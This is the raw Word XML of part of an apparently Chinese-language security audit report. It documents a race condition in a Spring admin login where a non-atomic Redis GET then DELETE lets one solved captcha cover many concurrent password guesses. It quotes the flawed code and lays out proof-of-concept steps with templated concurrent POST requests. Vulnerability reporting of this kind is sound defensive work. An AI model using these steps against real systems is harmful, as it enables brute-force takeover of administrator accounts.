      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DELETE key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 删除该 key，最后才做字符串比对。由于这两个 Redis 命令之间存在时间窗口（即 TOCTOU：Time-Of-Check Time-Of-Use），攻击者可以在同一毫秒内发起多个携带相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的并发请求。在 Thread-1 完成 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之前，Thread-2 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已拿到相同的验证码明文，两个线程都能通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>stored.equalsIgnoreCase(userInput.trim())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 校验，从而实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一个验证码换 N 次登录机会</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代码注释已明确说明为了兼容 Redis &lt; 6.2 放弃了原子的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GETDEL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，但未用 Lua 脚本补偿原子性：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 使用 get + delete 替代 getAndDelete，兼容 Redis &lt; 6.2（GETDEL 命令在 6.2 引入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>结合以下背景，危害显著提升：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/admin/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 接口在 Spring Security 中被 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ADMIN_PUBLIC_PATHS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 完全放行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>permitAll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），无任何额外鉴权或 IP 限速可见；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>管理端登录接口一旦被成功暴力破解，攻击者将获得管理员权限，可操控后台全部功能（用户管理、提现管理、赛季管理等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="14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 xml:space="preserve">攻击者访问 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /admin/captcha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获取一个合法的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 并（人工/OCR/机器学习）识别验证码图片得到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="150"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">随即并发发送大量 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /admin/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求，所有请求使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>相同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，仅 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>encryptedPassword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）字段不同；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">首个到达 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>verify()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的线程调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate.opsForValue().get(key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 拿到存储值；在该线程执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>redisTemplate.delete(key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之前，其余并发线程的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同样能拿到值（key 尚未被删除）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">所有在 DELETE 前完成 GET 的线程均通过验证码校验，继续向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>adminLoginService.login(username, password)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传递不同密码进行认证尝试；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="153"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>通过批量并发，攻击者可将每次需要解一张验证码的代价，摊薄为每张验证码试探 N 个密码，实质上大幅削弱了验证码的防暴力破解能力。</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入口：AdminLoginController.java  POST /admin/login</w:t>
              <w:br/>
              <w:t>// LoginRequest 可控字段：</w:t>
              <w:br/>
              <w:t>//   String username;</w:t>
              <w:br/>
              <w:t>//   String password;          ← 明文密码（攻击者可控，遍历不同值）</w:t>
              <w:br/>
              <w:t>//   String encryptedPassword;</w:t>
              <w:br/>
              <w:t>//   String captchaKey;        ← 攻击者固定复用同一个 key</w:t>
              <w:br/>
              <w:t>//   String captchaCode;       ← 攻击者固定复用同一个 code</w:t>
              <w:br/>
              <w:t>@PostMapping("/login")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;AdminLoginVO&gt; login(@RequestBody LoginRequest req) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // captchaKey / captchaCode 非空校验，攻击者轻易满足</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (req == null || req.getCaptchaKey() == null || req.getCaptchaKey().isBlank()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || req.getCaptchaCode() == null || req.getCaptchaCode().isBlank()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ApiResponse.error(400, "请填写验证码");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!adminCaptchaService.verify(req.getCaptchaKey(), req.getCaptchaCode())) { // ← 进入存在竞态的 verify()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return ApiResponse.error(400, "验证码错误或已过期");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // 验证码通过后，使用攻击者传入的不同 password 尝试登录</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String password = req.getPassword();                        // ← 攻击者可控，逐一遍历</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String token = adminLoginService.login(username, password); // ← 暴力破解入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 漏洞点：AdminCaptchaService.java:verify</w:t>
              <w:br/>
              <w:t>public boolean verify(String captchaKey, String userInput) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String key = captchaKey.startsWith(REDIS_KEY_PREFIX) ? captchaKey : REDIS_KEY_PREFIX + captchaKey;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 非原子操作窗口开始</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String stored = redisTemplate.opsForValue().get(key);    // ← Thread-1 &amp; Thread-2 均在此取到相同值</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (stored == null) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    redisTemplate.delete(key);                                // ← Thread-1 先删；Thread-2 的 GET 已完成，不受影响</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    //</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ↑ 非原子操作窗口结束</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    boolean ok = stored.equalsIgnoreCase(userInput.trim());  // ← Thread-2 同样通过！验证码被复用</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ok;</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Step 1：获取合法验证码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GET /admin/captcha HTTP/1.1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Host: &lt;target&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中获取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>abc123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）和验证码图片，识别出 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>R7KP</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Step 2：并发暴力破解（以 Python 伪 POC 为例，同时发送 N 个请求）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/admin/login HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"username":"admin","password":"&lt;password_candidate_1&gt;","captchaKey":"abc123","captchaCode":"R7KP"}</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/admin/login HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"username":"admin","password":"&lt;password_candidate_2&gt;","captchaKey":"abc123","captchaCode":"R7KP"}</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/admin/login HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"username":"admin","password":"&lt;password_candidate_N&gt;","captchaKey":"abc123","captchaCode":"R7KP"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（以上 N 个请求在同一时刻并发发送，利用 HTTP/2 单包技术或多线程工具如 Turbo Intruder）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">向 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /admin/captcha</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 发起请求，获取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 及验证码图片；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 OCR 工具或人工识别验证码图片，得到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">构造包含相同 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
